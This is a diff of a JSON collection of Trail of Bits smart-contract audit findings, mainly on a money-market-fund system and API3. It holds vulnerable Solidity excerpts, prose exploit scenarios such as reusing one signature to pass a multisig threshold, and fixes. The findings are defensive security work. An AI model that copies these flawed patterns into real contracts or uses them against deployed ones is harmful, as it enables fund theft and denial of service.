Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", + "title": "5. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The MMF has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler , the optional optimizations may not be safe . optimizer: { enabled: true , runs: 200 , }, Figure 5.1: Hardhat optimizer enabled in hardhat.config.js Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them. Therefore, it is unclear how well they are being tested and exercised. Moreover, optimizations are actively being developed . High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the MMF contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "8. Ocean may accept unexpected airdrops ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "Unexpected transfers of tokens to the Ocean contract may break its internal accounting, essentially leading to the loss of the transferred asset. To mitigate this risk, Ocean attempts to reject airdrops. Per the ERC721 and ERC1155 standards, contracts must implement specific methods to accept or deny token transfers. To do this, the Ocean contract uses the onERC721Received and onERC1155Received callbacks and _ERC1155InteractionStatus and _ERC721InteractionStatus storage flags. These storage flags are enabled in ERC721 and ERC1155 wrapping operations to facilitate successful standard-compliant transfers. However, the _erc721Unwrap and _erc1155Unwrap functions also enable the _ERC721InteractionStatus and _ERC1155InteractionStatus flags, respectively. Enabling these flags allows for airdrops, since the Ocean contract, not the user, is the recipient of the tokens in unwrapping operations.
function _erc721Unwrap( address tokenAddress, uint256 tokenId, address userAddress, uint256 oceanId ) private { _ERC721InteractionStatus = INTERACTION; IERC721(tokenAddress).safeTransferFrom( address(this), userAddress, tokenId ); _ERC721InteractionStatus = NOT_INTERACTION; emit Erc721Unwrap(tokenAddress, tokenId, userAddress, oceanId); } Figure 8.1: The _erc721Unwrap() function in Ocean.sol#L1020- Exploit Scenario Alice calls the _erc721Unwrap function. When the onERC721Received callback function in Alice's contract is called, Alice mistakenly sends the ERC721 tokens back to the Ocean contract. As a result, her ERC721 is permanently locked in the contract and effectively burned. Recommendations Short term, disallow airdrops of standard-compliant tokens during unwrapping interactions and document the edge cases in which the Ocean contract will be unable to stop token airdrops. Long term, when the Ocean contract is expecting a specific airdrop, consider storing the originating address of the transfer and the token type alongside the relevant interaction flag.", + "title": "6. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Although dependency scans did not identify a direct threat to the project codebase, npm audit found dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the MMF system. The output detailing the identified issues has been included below: Dependency Version ID", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "1. Publish-subscribe protocol users are vulnerable to a denial of service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The API3 system implements a publish-subscribe protocol through which a requester can receive a callback from an API when specified conditions are met. These conditions can be hard-coded when the Airnode is configured or stored on-chain. When they are stored on-chain, the user can call storeSubscription to establish other conditions for the callback (by specifying parameters and conditions arguments of type bytes ). The arguments are then used in abi.encodePacked , which could result in a subscriptionId collision. function storeSubscription( [...] bytes calldata parameters, bytes calldata conditions, [...] ) external override returns ( bytes32 subscriptionId) { [...] subscriptionId = keccak256 ( abi .encodePacked( chainId, airnode, templateId, parameters , conditions , relayer, sponsor, requester, fulfillFunctionId ) ); subscriptions[subscriptionId] = Subscription({ chainId: chainId, airnode: airnode, templateId: templateId, parameters: parameters, conditions: conditions, relayer: relayer, sponsor: sponsor, requester: requester, fulfillFunctionId: fulfillFunctionId }); Figure 1.1: StorageUtils.sol#L135-L158 The Solidity documentation includes the following warning: If you use keccak256(abi.encodePacked(a, b)) and both a and b are dynamic types, it is easy to craft collisions in the hash value by moving parts of a into b and vice-versa. More specifically, abi.encodePacked(\"a\", \"bc\") == abi.encodePacked(\"ab\", \"c\").
If you use abi.encodePacked for signatures, authentication or data integrity, make sure to always use the same types and check that at most one of them is dynamic. Unless there is a compelling reason, abi.encode should be preferred. Figure 1.2: The Solidity documentation details the risk of a collision caused by the use of abi.encodePacked with more than one dynamic type. Exploit Scenario Alice calls storeSubscription to set the conditions for a callback from a specific API to her smart contract. Eve, the owner of a competitor protocol, calls storeSubscription with the same arguments as Alice but moves the last byte of the parameters argument to the beginning of the conditions argument. As a result, the Airnode will no longer report API results to Alice's smart contract. Recommendations Short term, use abi.encode instead of abi.encodePacked (a sketch follows below). Long term, carefully review the Solidity documentation , particularly the Warning sections regarding the pitfalls of abi.encodePacked .", + "title": "7. Unimplemented getVersion function returns default value of zero ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The getVersion function within the TransferAgentModule contract is not implemented; at present, it yields the default uint8 value of zero. function getVersion() external pure virtual override returns ( uint8 ) {} Figure 7.1: Unimplemented getVersion function in the TransferAgentModule contract The other module contracts establish a pattern where the getVersion function is supposed to return a value of one. function getVersion() external pure virtual override returns ( uint8 ) { return 1; } Figure 7.2: Implemented getVersion function in the TransactionalModule contract Exploit Scenario Alice calls the getVersion function on the TransferAgentModule contract. It returns zero, and all the other module contracts return one. Alice misunderstands which version of its lifecycle each contract is on. Recommendations Short term, implement the getVersion function in the TransferAgentModule contract so it matches the specification established in the other modules. Long term, use the Slither static analyzer to catch common issues such as this one. Implement slither-action into the project's CI pipeline.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "2. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The API3 contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported.
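For the abi.encodePacked collision above (finding 1 of the API3 review), a minimal sketch of the short-term fix; the argument list is trimmed relative to figure 1.1 for illustration. Because abi.encode pads and length-prefixes each dynamic argument, moving a byte between parameters and conditions changes the hash:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical sketch with a reduced argument list.
contract SubscriptionIdSketch {
    function subscriptionId(
        uint256 chainId,
        address airnode,
        bytes32 templateId,
        bytes calldata parameters,
        bytes calldata conditions
    ) external pure returns (bytes32) {
        // abi.encode, unlike abi.encodePacked, is collision-resistant for
        // multiple dynamic arguments.
        return keccak256(abi.encode(chainId, airnode, templateId, parameters, conditions));
    }
}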
A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the API3 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "8. The MultiSigGenVerifier threshold can be passed with a single signature ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "A single signature can be used multiple times to pass the threshold in the MultiSigGenVerifier contract, allowing a single signer to take full control of the system. The signedDataExecution function in the MultiSigGenVerifier contract verifies provided signatures and accumulates the acquiredThreshold value in a loop as shown in figure 8.1: for ( uint256 i = 0 ; i < signaturesCount; i++) { (v, r, s) = _splitSignature(signatures, i); address signerRecovered = ecrecover( hash , v, r, s); if (signersSet.contains(signerRecovered)) { acquiredThreshold += signersMap[signerRecovered]; } } Figure 8.1: The signer recovery section of the signedDataExecution function in the MultiSigGenVerifier contract This code checks whether the recovered signer address is one of the previously added signers and adds the signer's weight to acquiredThreshold . However, the code does not check that all the recovered signers are unique, which allows the submitter to pass the threshold with only a single signature to execute the signed transaction. The current function has an implicit zero-address check in the subsequent if statement: to add new signers, they must not be address(0) . If this logic changes in the future, the impact of the ecrecover function returning address(0) (which happens when a signature is malformed) must be carefully reviewed. Exploit Scenario Eve, a signer, colludes with a submitter to settle their transactions at a favorable date and price. Eve signs the transaction and provides it to the submitter. The submitter uses this signature to call the signedDataExecution function by repeating the same signature multiple times in the signatures argument array to pass the threshold. Using this method, Eve can execute any admin transaction without consent from other admins. Recommendations Short term, have the code verify that the signatures provided to the signedDataExecution function are unique. One way of doing this is to sort the signatures in increasing order of the signer addresses and verify this order in the loop.
An example of this order verification code is shown in figure 8.2: address lastSigner = address(0); for ( uint256 i = 0 ; i < signaturesCount; i++) { (v, r, s) = _splitSignature(signatures, i); address signerRecovered = ecrecover( hash , v, r, s); require (lastSigner < signerRecovered); lastSigner = signerRecovered; if (signersSet.contains(signerRecovered)) { acquiredThreshold += signersMap[signerRecovered]; } } Figure 8.2: Example code to verify the uniqueness of the provided signatures Long term, expand unit test coverage to account for common edge cases, and carefully consider all possible values for any user-provided inputs. Implement fuzz testing to explore complex scenarios and find difficult-to-detect bugs in functions with user-provided inputs.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: N/A" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "3. Decisions to opt out of a monetization scheme are irreversible ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The API3 protocol implements two on-chain monetization schemes. If an Airnode owner decides to opt out of a scheme, the Airnode will not receive additional token payments or deposits (depending on the scheme). Although the documentation states that Airnodes can opt back in to a scheme, the current implementation does not allow it. /// @notice If the Airnode is participating in the scheme implemented by /// the contract: /// Inactive: The Airnode is not participating, but can be made to /// participate by a mantainer /// Active: The Airnode is participating /// OptedOut: The Airnode actively opted out, and cannot be made to /// participate unless this is reverted by the Airnode mapping(address => AirnodeParticipationStatus) public override airnodeToParticipationStatus; Figure 3.1: RequesterAuthorizerWhitelisterWithToken.sol#L59-L68 /// @notice Sets Airnode participation status /// @param airnode Airnode address /// @param airnodeParticipationStatus Airnode participation status function setAirnodeParticipationStatus( address airnode, AirnodeParticipationStatus airnodeParticipationStatus ) external override onlyNonZeroAirnode(airnode) { if (msg.sender == airnode) { require( airnodeParticipationStatus == AirnodeParticipationStatus.OptedOut, \"Airnode can only opt out\" ); } else { [...] Figure 3.2: RequesterAuthorizerWhitelisterWithToken.sol#L229-L242 Exploit Scenario Bob, an Airnode owner, decides to temporarily opt out of a scheme, believing that he will be able to opt back in; however, he later learns that this is not possible and that his Airnode will be unable to accept any new requesters. Recommendations Short term, adjust the setAirnodeParticipationStatus function to allow Airnodes that have opted out of a scheme to opt back in. Long term, write extensive unit tests that cover all of the expected pre- and postconditions. Unit tests could have uncovered this issue.", + "title": "9. Shareholders can renounce their authorization role ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Shareholders can renounce their authorization role. As a result, system contracts that check for authorization and off-chain components may not work as expected because of an inconsistent system state. The AuthorizationModule contract extends the AccessControlUpgradeable contract from the OpenZeppelin library.
The AccessControlUpgradeable contract has a public renounceRole function, which can be called by anyone to revoke a role on their own account. function renounceRole ( bytes32 role , address account ) public virtual override { require (account == _msgSender(), \"AccessControl: can only renounce roles for self\" ); _revokeRole(role, account); } Figure 9.1: The renounceRole function of the base contract from the OpenZeppelin library Any shareholder can use the renounceRole function to revoke the ROLE_FUND_AUTHORIZED role on their own account without authorization from the admin. This role is used in three functions in the AccessControlUpgradeable contract: 1. The isAccountAuthorized function to check if an account is authorized 2. The getAuthorizedAccountsCount to get the number of authorized accounts 3. The getAuthorizedAccountAt to get the authorized account at an index Other contracts and off-chain components relying on these functions may find the system in an inconsistent state and may not be able to work as expected. Exploit Scenario Eve, an authorized shareholder, renounces her ROLE_FUND_AUTHORIZED role. The off-chain components fetch the number of authorized accounts, which is one less than the expected value. The off-chain component is now operating on an inaccurate contract state. Recommendations Short term, have the code override the renounceRole function in the AuthorizationModule contract. Make this overridden function an admin-only function (a sketch follows below). Long term, read all the library code to find public functions exposed by the base contracts and override them to implement correct business logic and enforce proper access controls. Document any changes between the original OpenZeppelin implementation and the MMF implementation. Be sure to thoroughly test overridden functions and changes in unit tests and fuzz tests.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "4. Depositors can front-run request-blocking transactions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "A depositor can front-run a request-blocking transaction and withdraw his or her deposit. The RequesterAuthorizerWhitelisterWithTokenDeposit contract enables a user to indefinitely whitelist a requester by depositing tokens on behalf of the requester. A manager or an address with the blocker role can call setRequesterBlockStatus or setRequesterBlockStatusForAirnode with the address of a requester to block that user from submitting requests; as a result, any user who deposited tokens to whitelist the requester will be blocked from withdrawing the deposit. However, because one can execute a withdrawal immediately, a depositor could monitor the transactions and call withdrawTokens to front-run a blocking transaction. Exploit Scenario Eve deposits tokens to whitelist a requester. Because the requester then uses the system maliciously, the manager blacklists the requester, believing that the deposited tokens will be seized. However, Eve front-runs the transaction and withdraws the tokens. Recommendations Short term, implement a two-step withdrawal process in which a depositor has to express his or her intention to withdraw a deposit and the funds are then unlocked after a waiting period. Long term, analyze all possible front-running risks in the system.",
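A minimal sketch of the short-term recommendation for finding 9 above, assuming OpenZeppelin's AccessControlUpgradeable v4 interface; the role constant mirrors the report, the rest of the scaffolding is illustrative. Calling the internal _revokeRole directly is one way to read "admin-only", since the base implementation's self-only require would otherwise restrict the admin to renouncing only their own roles:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts-upgradeable/access/AccessControlUpgradeable.sol";

// Hypothetical sketch: shareholders can no longer renounce roles
// themselves, keeping on-chain state consistent with what off-chain
// components expect.
contract AuthorizationModuleSketch is AccessControlUpgradeable {
    bytes32 public constant ROLE_AUTHORIZATION_ADMIN =
        keccak256("ROLE_AUTHORIZATION_ADMIN");

    function renounceRole(bytes32 role, address account)
        public
        virtual
        override
        onlyRole(ROLE_AUTHORIZATION_ADMIN)
    {
        _revokeRole(role, account);
    }
}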
+ "title": "10. Risk of multiple dividend payouts in a day ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The fund manager can lose the system's money by making multiple dividend payouts in a day when they should be paid out only once a day. The distributeDividends function in the MoneyMarketFund contract takes the date as an argument. This date value is not validated to be later than the date from an earlier execution of the distributeDividends function. function distributeDividends ( address [] calldata accounts, uint256 date , int256 rate , uint256 price ) external onlyAdmin onlyWithValidRate(rate) onlyValidPaginationSize(accounts.length, MAX_ACCOUNT_PAGE_SIZE) { lastKnownPrice = price; for ( uint i = 0 ; i < accounts.length; ) { _processDividends(accounts[i], date, rate, price); unchecked { i++; } } } Figure 10.1: The distributeDividends function in the MoneyMarketFund contract As a result, the admin can distribute dividends multiple times a day, which will result in the loss of funds from the company to the users. The admin can correct this mistake by using the adjustBalance function, but adjusting the balance for all the system users will be a difficult and costly process. The same issue also affects the following three functions: 1. The endOfDay function in the MoneyMarketFund contract 2. The distributeDividends function in the TransferAgentModule contract 3. The endOfDay function in the TransferAgentModule contract. Exploit Scenario The admin sends a transaction to distribute dividends. The transaction is not included in the blockchain because of congestion or gas estimation errors. Forgetting about the earlier transaction, the admin sends another transaction, and both transactions are executed to distribute dividends on the same day. Recommendations Short term, have the code store the last dividend distribution date and validate that the date argument in all the dividend distribution functions is later than the last stored dividend date (a sketch follows below). Long term, document the system state machine specification and follow it to ensure proper data validation checks are added to all state-modifying functions.", "labels": [ "Trail of Bits", "Severity: Medium",
@@ -4242,39 +6930,29 @@
 ] }, {
- "title": "5. Incompatibility with non-standard ERC20 tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The RequesterAuthorizerWhitelisterWithTokenPayment and RequesterAuthorizerWhitelisterWithTokenDeposit contracts are meant to work with any ERC20 token. However, several high-profile ERC20 tokens do not correctly implement the ERC20 standard. These include USDT, BNB, and OMG, all of which have a large market cap. The ERC20 standard defines two transfer functions, among others: transfer(address _to, uint256 _value) public returns (bool success) transferFrom(address _from, address _to, uint256 _value) public returns (bool success) These high-profile ERC20 tokens do not return a boolean when at least one of the two functions is executed. As of Solidity 0.4.22, the size of return data from external calls is checked. As a result, any call to the transfer or transferFrom function of an ERC20 token with an incorrect return value will fail. Exploit Scenario Bob deploys the RequesterAuthorizerWhitelisterWithTokenPayment contract with USDT as the token. Alice wants to pay for a requester to be whitelisted and calls payTokens , but the transferFrom call fails.
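A minimal sketch of the short-term recommendation for finding 10 above; the modifier pattern is one option, and all names here are illustrative:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical sketch: a duplicated distribution transaction for the
// same day reverts instead of paying dividends out twice.
contract DividendScheduleSketch {
    uint256 public lastDividendDate;

    modifier onlyNewDividendDate(uint256 date) {
        require(date > lastDividendDate, "DIVIDEND_ALREADY_DISTRIBUTED");
        _;
        // Record the date only after the guarded function body succeeds.
        lastDividendDate = date;
    }
}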
As a result, the contract is unusable. Recommendations Short term, consider using the OpenZeppelin SafeERC20 library or adding explicit support for ERC20 tokens with incorrect return values. Long term, adhere to the token integration best practices outlined in appendix C .", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: N/A" ] }, { - "title": "6. Compromise of a single oracle enables limited control of the dAPI value ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "By compromising only one oracle, an attacker could gain control of the median price of a dAPI and set it to a value within a certain range. The dAPI value is the median of all values provided by the oracles. If the number of oracles is odd (i.e., the median is the value in the center of the ordered list of values), an attacker could skew the median, setting it to a value between the lowest and highest values submitted by the oracles. Exploit Scenario There are three available oracles: O0, with a price of 603; O1, with a price of 598; and O2, which has been compromised by Eve. Eve is able to set the median price to any value in the range [598, 603]. Eve can then turn a profit by adjusting the rate when buying and selling assets. Recommendations Short term, be mindful of the fact that there is no simple fix for this issue; regardless, we recommend implementing off-chain monitoring of the DapiServer contracts to detect any suspicious activity. Long term, assume that an attacker may be able to compromise some of the oracles. To mitigate a partial compromise, ensure that dAPI value computations are robust.", + "title": "11. Shareholders can stop admin from deauthorizing them ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Shareholders can prevent the admin from deauthorizing them by front-running the deauthorizeAccount function in the AuthorizationModule contract. The deauthorizeAccount function reverts if the provided account has one or more pending transactions. function deauthorizeAccount ( address account ) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) { require (account != address ( 0 ), \"INVALID_ADDRESS\" ); address txModule = modules.getModuleAddress( keccak256 ( \"MODULE_TRANSACTIONAL\" ) ); require (txModule != address ( 0 ), \"MODULE_REQUIRED_NOT_FOUND\" ); require ( hasRole(ROLE_FUND_AUTHORIZED, account), \"SHAREHOLDER_DOES_NOT_EXISTS\" ); require ( !ITransactionStorage(txModule).hasTransactions(account), \"PENDING_TRANSACTIONS_EXIST\" ); _revokeRole(ROLE_FUND_AUTHORIZED, account); emit AccountDeauthorized(account); } Figure 11.1: The deauthorizeAccount function in the AuthorizationModule contract A shareholder can front-run a transaction executing the deauthorizeAccount function for their account by submitting a new transaction request to buy or sell shares. The deauthorizeAccount transaction will revert because of a pending transaction for the shareholder. Exploit Scenario Eve, a shareholder, sets up a bot to front-run all deauthorizeAccount transactions that add a new transaction request for her. As a result, all admin transactions to deauthorize Eve fail. Recommendations Short term, remove the check for the pending transactions of the provided account and consider one of the following: 1. Have the code cancel the pending transactions of the provided account in the deauthorizeAccount function.
2. Add a check in the _processSettlements function in the MoneyMarketFund contract to skip unauthorized accounts. Add the same check in the _processSettlements function in the TransferAgentModule contract. Long term, always analyze all contract functions that can be affected by attackers' front-running calls to manipulate the system.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "7. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The execution of yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review. The output below details these issues. CVE ID", + "title": "12. Total number of submitters in MultiSigGenVerifier contract can be more than allowed limit of MAX_SUBMITTERS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The total number of submitters in the MultiSigGenVerifier contract can be more than the allowed limit of MAX_SUBMITTERS . The addSubmitters function in the MultiSigGenVerifier contract does not check that the total number of submitters in the submittersSet is less than the value of the MAX_SUBMITTERS constant. function addSubmitters ( address [] calldata submitters) public onlyVerifier { require (submitters.length <= MAX_SUBMITTERS, \"INVALID_ARRAY_LENGTH\" ); for ( uint256 i = 0 ; i < submitters.length; i++) { submittersSet.add(submitters[i]); } } Figure 12.1: The addSubmitters function in the MultiSigGenVerifier contract This allows the admin to add more than the maximum number of allowed submitters to the MultiSigGenVerifier contract. Recommendations Short term, add a check to the addSubmitters function to verify that the length of the submittersSet is less than or equal to the MAX_SUBMITTERS constant after the additions. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions. To ensure MAX_SUBMITTERS is never exceeded, add fuzz testing where MAX_SUBMITTERS is the system invariant under test.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "8. DapiServer beacon data is accessible to all users ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The lack of access controls on the conditionPspDapiUpdate function could allow an attacker to read private data on-chain. The dataPoints[] mapping contains private data that is supposed to be accessible on-chain only by whitelisted users. However, any user can call conditionPspDapiUpdate , which returns a boolean that depends on arithmetic over dataPoint : /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters /// @dev This method does not allow the caller to indirectly read a dAPI, /// which is why it does not require the sender to be a void signer with /// zero address. [...]
function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 8.1: dapis/DapiServer.sol:L468-L502 An attacker could abuse this function to deduce one bit of data per call (to determine, for example, whether a user's account should be liquidated). An attacker could also automate the process of accessing one bit of data to extract a larger amount of information by using a mechanism such as a dichotomic search. An attacker could therefore infer the value of dataPoint directly on-chain. Exploit Scenario Eve, who is not whitelisted, wants to read a beacon value to determine whether a certain user's account should be liquidated. Using the code provided in appendix E , she is able to confirm that the beacon value is greater than or equal to a certain threshold. Recommendations Short term, implement access controls to limit who can call conditionPspDapiUpdate . Long term, document all read and write operations related to dataPoint , and highlight their access controls. Additionally, consider implementing an off-chain monitoring system to detect any suspicious activity.", + "title": "13. Lack of contract existence check on target address ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The signedDataExecution function lacks validation to ensure that the target argument is a contract address and not an externally owned account (EOA). The absence of such a check could lead to potential security issues, particularly when executing low-level calls to an address not containing contract code. Low-level calls to an EOA return true for the success variable instead of reverting as they would with a contract address. This unexpected behavior could trigger inadvertent execution of subsequent code relying on the success variable to be accurate, potentially resulting in undesired outcomes. The onlySubmitter modifier limits the potential impact of this vulnerability. function signedDataExecution( address target, bytes calldata payload, bytes calldata signatures ) external onlySubmitter { ... // Wallet logic if (acquiredThreshold >= _getRequiredThreshold(target)) { (bool success, bytes memory result) = target.call{value: 0}( payload ); emit TransactionExecuted(target, result); if (!success) { assembly { result := add(result, 0x04) } revert(abi.decode(result, (string))); } } else { revert(\"INSUFICIENT_THRESHOLD_ACQUIRED\"); } } Figure 13.1: The signedDataExecution function in the MultiSigGenVerifier contract Exploit Scenario Alice, an authorized submitter account, calls the signedDataExecution function, passing in an EOA address instead of the expected contract address. The low-level call to the target address returns successfully and does not revert. As a result, Alice thinks she has executed code but in fact has not. Recommendations Short term, integrate a contract existence check to ensure that code is present at the address passed in as the target argument (a sketch follows below). Long term, use the Slither static analyzer to catch issues such as this one.
Consider integrating slither-action into the project's CI pipeline.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Low" ] }, { - "title": "9. Misleading function name ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", - "body": "The conditionPspDapiUpdate function always updates the dataPoints storage variable (by calling updateDapiWithBeacons ), even if the function returns false (i.e., the condition for updating the variable is not met). This contradicts the code comment and the behavior implied by the function's name. /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters [...] function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 9.1: dapis/DapiServer.sol#L468-L502 Recommendations Short term, revise the documentation to inform users that a call to conditionPspDapiUpdate will update the dAPI even if the function returns false . Alternatively, develop a function similar to updateDapiWithBeacons that returns the updated value without actually updating it. Long term, ensure that functions' names reflect the implementation.", + "title": "14. Pending transactions can trigger a DoS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "An unbounded number of pending transactions can cause the _processSettlements function to run out of gas while trying to process them. There is no restriction on the number of pending transactions a user might have, and gas-intensive operations are performed in the for-loop of the _processSettlements function. If the lookup returns too many pending transactions for an account, operations that call _processSettlements might revert with an out-of-gas error. function _processSettlements( address account, uint256 date, uint256 price ) internal whenTransactionsExist(account) { bytes32 [] memory pendingTxs = ITransactionStorage( moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE) ).getAccountTransactions(account); for ( uint256 i = 0; i < pendingTxs.length; ) { ... Figure 14.1: The pendingTxs loop in the _processSettlements function in the MoneyMarketFund contract The same issue affects the _processSettlements function in the TransferAgentModule contract. Exploit Scenario Eve submits multiple transactions to the requestSelfServiceCashPurchase function, and each creates a pending transaction record in the pendingTransactionsMap for Eve's account. When settleTransactions is called with an array of accounts that includes Eve, the _processSettlements function tries to process all her pending transactions and runs out of gas in the attempt. Recommendations Short term, make the following changes to the transaction settlement flow: 1. Enhance the off-chain component of the system to identify accounts with too many pending transactions and exclude them from calls to _processSettlements flows. 2. Create another transaction settlement function that paginates over the list of pending transactions of a single account.
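A minimal sketch of the contract existence check recommended in finding 13 above; address.code requires Solidity 0.8.1 or later, and the library wrapper is illustrative:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

// Hypothetical sketch: a low-level call to an address without code
// returns success, so the caller must check for code explicitly
// before target.call{value: 0}(payload).
library AddressChecks {
    function checkIsContract(address target) internal view {
        require(target.code.length > 0, "TARGET_NOT_A_CONTRACT");
    }
}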
Long term, implement thorough testing protocols for these loop structures, simulating various scenarios and edge cases that could potentially result in unbounded inputs. Ensure that all loop structures are robustly designed with safeguards in place, such as constraints and checks on input variables.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "1. Console's Field and Scalar divisions panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The division operations of the Field and Scalar types do not guard against a division by zero. This causes a runtime panic when values from these types are divided by zero. Figure 1.1 shows a test and the respective stack backtrace, where a None option is unconditionally unwrapped in snarkvm/fields/src/fp_256.rs : #[test] fn test_div () { let zero = Field::::zero(); // Sample a new field. let num = Field::::new(Uniform::rand(& mut test_rng())); // Divide by zero let neg = num.div(zero); } // running 1 test // thread 'arithmetic::tests::test_div' panicked at 'called `Option::unwrap()` on a `None` value', /snarkvm/fields/src/fp_256.rs:709:42 // stack backtrace: // 0: rust_begin_unwind // at /rustc/v/library/std/src/panicking.rs:584:5 // 1: core::panicking::panic_fmt // at /rustc/v/library/core/src/panicking.rs:142:14 // 2: core::panicking::panic // at /rustc/v/library/core/src/panicking.rs:48:5 // 3: core::option::Option::unwrap // at /rustc/v/library/core/src/option.rs:755:21 // 4: as 